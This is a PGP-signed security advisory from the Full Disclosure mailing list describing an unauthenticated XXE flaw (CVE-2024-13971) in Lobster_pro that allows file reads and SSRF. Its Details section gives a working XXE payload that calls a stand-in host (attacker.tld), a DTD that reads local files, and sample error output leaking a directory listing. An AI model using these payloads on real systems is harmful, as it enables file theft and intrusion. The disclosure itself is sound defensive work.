SCHUTZWERK-SA-2024-005: Arbitrary File Read and Server Side Request Forgery via XML External Entities in Lobster_pro (CVE-2024-13971)

[David Brown via Fulldisclosure <fulldisclosure () seclists org>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Arbitrary File Read and Server Side Request Forgery via XML External 
Entities in
Lobster_pro
============================================================================================

Unauthenticated attackers can exploit a weakness in the XML parser 
functionality of
Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read 
access to files on
the application server and adjacent network shares, and perform HTTP GET 
requests to
arbitrary services.

Metadata
========

- - Affected product: Lobster_pro
- - Affected version: versions prior to 4.12.6-GA
- - Vendor: Lobster DATA GmbH
- - Problem type(s): CWE-611 Improper Restriction of XML External Entity 
Reference
- - CVE ID: CVE-2024-13971
- - CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-13971
- - CVSS 4.0 score: 7.7
- - Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-005/

Details
=======

During a recent red team engagement, the no-code platform Lobster_pro 
was identified as
part of the customer's internet-facing assets.

The endpoint https://<lobster-pro instance>:443/system/web was found to 
process XML via
HTTP POST requests. Sending the following payload and observing the 
attacker-controlled
web server confirms that XML External Entities (XXE) are followed and 
loaded by the
application:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lbsterq [
         <!ENTITY % lobster SYSTEM "http://attacker.tld/map.dtd";>
%lobster;
]>
<properties>lobster</properties>

Serving the following file map.dtd, it is possible to retrieve file 
contents, directory
listings or HTTP responses via the error message returned by the endpoint:

<!ENTITY % cfga SYSTEM "file:///c:">
<!ENTITY % eea "<!ENTITY &#x25; lobsterdata SYSTEM '#%cfga;'>">
%eea;
%lobsterdata;

The HTTP response contains an error message, embedding the file content 
or directory
listing:

<?xml version="1.0" encoding="UTF-8"?>
<core:ErrorResponse xmlns:core="CORESYSTEM">
   <errorInfo>
      <errorCode>500</errorCode>
      <httpResponseStatus>200</httpResponseStatus>
      <locale>en</locale>
      <errorText>javax.xml.bind.UnmarshalException
 - with linked exception:
[Exception [EclipseLink-25004] (Eclipse Persistence Services - 
2.7.8.qualifier): 
org.eclipse.persistence.exceptions.XMLMarshalException&#xd;
Exception Description: An error occurred unmarshalling the document&#xd;
Internal Exception: javax.xml.stream.XMLStreamException: ParseError at 
[row,col]:[4,10]
Message: no protocol: #$Recycle.Bin
Config.Msi
[...]
pagefile.sys
PerfLogs
ProgramData
Program Files
Program Files (x86)
Programme
[...]
temp
Users
Windows
]</errorText>
      <errorType>java.io.IOException</errorType>
      <errorLevel>1</errorLevel>
   </errorInfo>
</core:ErrorResponse>

Due to the way content is included, some symbols (e.g., the percent sign 
%) lead to
recursive entity declarations, thus preventing data exfiltration.

Risk
====

An attacker can use the vulnerability to gather information and, 
depending on the stored
data, exfiltrate secrets from the file system and adjacent SMB shares. 
Furthermore, HTTP
requests can be used for out-of-band exfiltration and server side 
request forgery (SSRF)
attacks. Utilizing the SMB protocol could also enable leakage of the 
application user NTLM
hash.

Solution/Mitigation
===================

Update to Lobster_pro release 4.12.6-GA or higher.

Timeline
========

- - 2024-08-12 Initial contact with vendor
- - 2024-08-14 Vulnerability reported to vendor
- - 2024-08-14 CVE ID requested
- - 2024-08-22 Initial feedback received from vendor: unable to reproduce
- - 2024-08-28 Vulnerability demonstrated in vendor's "Community server"
- - 2024-09-19 Vulnerability reported fixed by vendor in Lobster_pro 
release 4.12.6-GA
- - 2025-07-03 Reserved CVE ID CVE-2024-13971
- - 2026-04-30 Advisory released

Credits
=======

The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmnzRmsaHGFkdmlzb3Jp
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsvxRAAkVaWMk/lJwfZi0Y0OWpr
5TQP/YCieTkxpkdiY0PF8dGApB3cp8ysschRAUgWIbeR7f1cj/4hbc3a1GxnZWV7
2gk1fdQieSdkJs8uBsKz0CeEasMztCI6KcmxWL+CMFHJoH+Q5Gd7MdOh1Og/zVgh
/UAAfzxihL0Gmx+gl6hpZVYSmqQctD4ogbmdQCU2mEuoHZRGLCzaiOtS8AZbOhvT
3IvC3ws3cQIAwzD7YH+5V+97cXqbFVnRoNL4YgJ9/pCHXinYZvL1JGL4Ob26/GvD
QfYqUOgpDsfr9GTZVSZT3S8pUVomMW9+FOjhpcOkRICkJ8cEdLhW5CIoaxweEcwE
PQSSC5QS5DIfVKgGo4lc0Oe9k3pT/dnH9iEfnV5hnq7+JgapQzqxNaf6BCZJX+ET
voIVVjyOYyP2Qzs4LSaArWxlcb0XR/DewW9qlvfnea4SfDkrG/hhRK3qBNrC83IR
IXmBTbp32Sfoh2X1W/frL4BtvIXkDirgF+sttAjoQKN3wVttuKj1JaM/BQ/pDf/N
pPAwaYzuuuf2Wv3NiBKIgB5tHuHKAQoKQPev7Z6pvDq0sB5ps9SRknIOEmfh/aoE
7aNztVHs+/6axCVKcuV7+qWv6HUwg4oDp78Lo9r8Oq/9rdbZ3TKtf/KWn4uT+sWw
Zk6o928sfQFlkXtTXRiGSwE=
=560Z
-----END PGP SIGNATURE-----

--
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories () schutzwerk com / www.schutzwerk.com

Geschäftsführer / Managing Directors:
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm /  HRB 727391
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Attachment: OpenPGP_0x1AB5DF9132172EBB.asc
Description: OpenPGP public key

Attachment: OpenPGP_signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/